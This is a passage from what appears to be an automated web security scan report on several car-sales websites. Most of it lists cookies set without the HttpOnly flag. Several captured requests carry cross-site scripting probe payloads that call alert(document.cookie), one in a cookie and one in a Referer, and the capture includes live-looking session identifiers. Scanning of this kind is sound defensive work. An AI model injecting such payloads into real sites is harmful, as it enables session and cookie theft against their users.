Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: ?Email_Addr_vch=&Postal_Code_vch=&FirstName=&LastName=&DefaultInList=&EmailAddressError=6&PostalCodeError=3&LoginError=0&WasError=1
Server: Microsoft-IIS/7.0
Content-Length: 138
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:41:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:14 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:14 GMT;path=/
Set-Cookie: ID=;expires=Sun, 24-Jan-2010 23:41:14 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/


<html>
<head>
   <title>Signup</title>
   <link rel="stylesheet" type="text/css" href="/interface/abtl/cars.css">
</head>
<body>


14.643. http://www.autobytel.com/new-car-price-quotes.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-car-price-quotes.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:00 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-car-price-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:44:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:00 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62665


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.644. http://www.autobytel.com/new-cars.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-cars.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:24 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:24 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:24 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104069


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.645. http://www.autobytel.com/used-cars.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /used-cars.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:33 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /used-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:33 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 79078


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.646. http://www.autobytel.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • cweb=JONQJVS10.4.128.184CKMMK; path=/
  • USER_UUID_VCH=37AC631C%2DE9D5%2DFD37%2DEDAF61EB5BA1725D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
  • TIME=%7Bts%20%272011%2D01%2D24%2008%3A03%3A09%27%7D;path=/
  • TIME=%7Bts%20%272011%2D01%2D24%2012%3A04%3A09%27%7D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
  • ID=4%3BABTL;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23119
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 16:04:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 16:04:10 GMT
Connection: close
Set-Cookie: cweb=JONQJVS10.4.128.184CKMMK; path=/
Set-Cookie: USER_UUID_VCH=37AC631C%2DE9D5%2DFD37%2DEDAF61EB5BA1725D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2008%3A03%3A09%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2012%3A04%3A09%27%7D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=1;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: --> <!-- Referer: None --> <!--
This file creates a boxerjam cookie that expires
...[SNIP]...

14.647. http://www.automotive.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.automotive.com
Path:   /x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • UserPuid=2325714041713319967; domain=automotive.com; expires=Mon, 24-Jan-2061 16:04:18 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.automotive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 24 Jan 2011 16:04:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.automotive.com/x22/index.html
Set-Cookie: ASP.NET_SessionId=ru5vzmel1nvlrbjo404j0i55; path=/; HttpOnly
Set-Cookie: UserPuid=2325714041713319967; domain=automotive.com; expires=Mon, 24-Jan-2061 16:04:18 GMT; path=/
Cache-Control: private
Content-Length: 0


14.648. http://www.autotrader.com/ajax/backButtonFix.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /ajax/backButtonFix.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerAT-Production_hhtp=3526518282.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/backButtonFix.jsp HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIRF_Audit=true; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; ATC_PID=-1761786222|959219900373039673; v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:16:18 GMT
Server: Apache
Content-Length: 34
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=3526518282.61475.0000; path=/

/fyc/index.jsp?bkms=1295964978669

14.649. http://www.autotrader.com/cms/img/homepage/autoMercado_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /cms/img/homepage/autoMercado_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerwww=1619582986.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/img/homepage/autoMercado_logo.gif HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:41 GMT
Server: Apache
Last-Modified: Wed, 08 Sep 2010 20:38:55 GMT
Accept-Ranges: bytes
Content-Length: 2439
Cache-Control: max-age=604800
Expires: Tue, 01 Feb 2011 02:19:41 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Set-Cookie: BIGipServerwww=1619582986.61475.0000; path=/

GIF89a..................TX`.'1.....................................................&.!*.").$-.AH.......................}....!..#..$..$..%..&..&..(..'..(..). *.!,.!+.#..",.#-.%..$..%/.&0.&0.'0.(2.)3.*
...[SNIP]...

14.650. http://www.autotrader.com/fyc/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /fyc/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerAT-Production_hhtp=3476186634.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fyc/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:56:02 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=3476186634.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.651. http://www.autotrader.com/fyc/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /fyc/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=89BF6C3250E2E334; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885067966444; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
  • BIGipServerwww=1351147530.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fyc/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:27 GMT
Server: Apache
Set-Cookie: v1st=89BF6C3250E2E334; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885067966444; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1351147530.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.652. http://www.autotrader.com/hornav/trader/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /hornav/trader/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerAT-Production_hhtp=3778176522.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hornav/trader/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:56:08 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=3778176522.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.653. http://www.autotrader.com/hornav/trader/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /hornav/trader/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=5789AE528FD93066; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885068472993; path=/; expires=Sat, 03-Jan-15 16:04:28 GMT; domain=.autotrader.com
  • BIGipServerwww=1552474122.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hornav/trader/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:28 GMT
Server: Apache
Set-Cookie: v1st=5789AE528FD93066; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885068472993; path=/; expires=Sat, 03-Jan-15 16:04:28 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1552474122.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.654. http://www.autotrader.com/inc/ad.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /inc/ad.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerAT-Production_hhtp=3140642314.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/ad.html HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIRF_Audit=true; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; ATC_PID=-1761786222|959219900373039673; v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:15:53 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 12:42:24 GMT
Accept-Ranges: bytes
Content-Length: 1999
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=604800
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=3140642314.61475.0000; path=/

<html>
<head>
<script src="http://ads.autotrader.com/DE/DartRichMedia_1_03.js" type="text/javascript"></script>
<script src="http://ads.autotrader.com/DE/flash8.js" type="text/javascript"></sc
...[SNIP]...

14.655. http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0001_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=7569AE0D6B39E1B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767490185; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
  • BIGipServerwww=1737023498.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0001_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=7569AE0D6B39E1B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767490185; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1737023498.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

14.656. http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0002_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=BF3F7217996B123A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767492259; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
  • BIGipServerwww=1317593098.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0002_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=BF3F7217996B123A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767492259; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1317593098.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

14.657. http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0005_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=1AA3D7F874709C04; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767486770; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
  • BIGipServerwww=1653137418.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0005_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=1AA3D7F874709C04; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767486770; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1653137418.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

14.658. http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0006_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
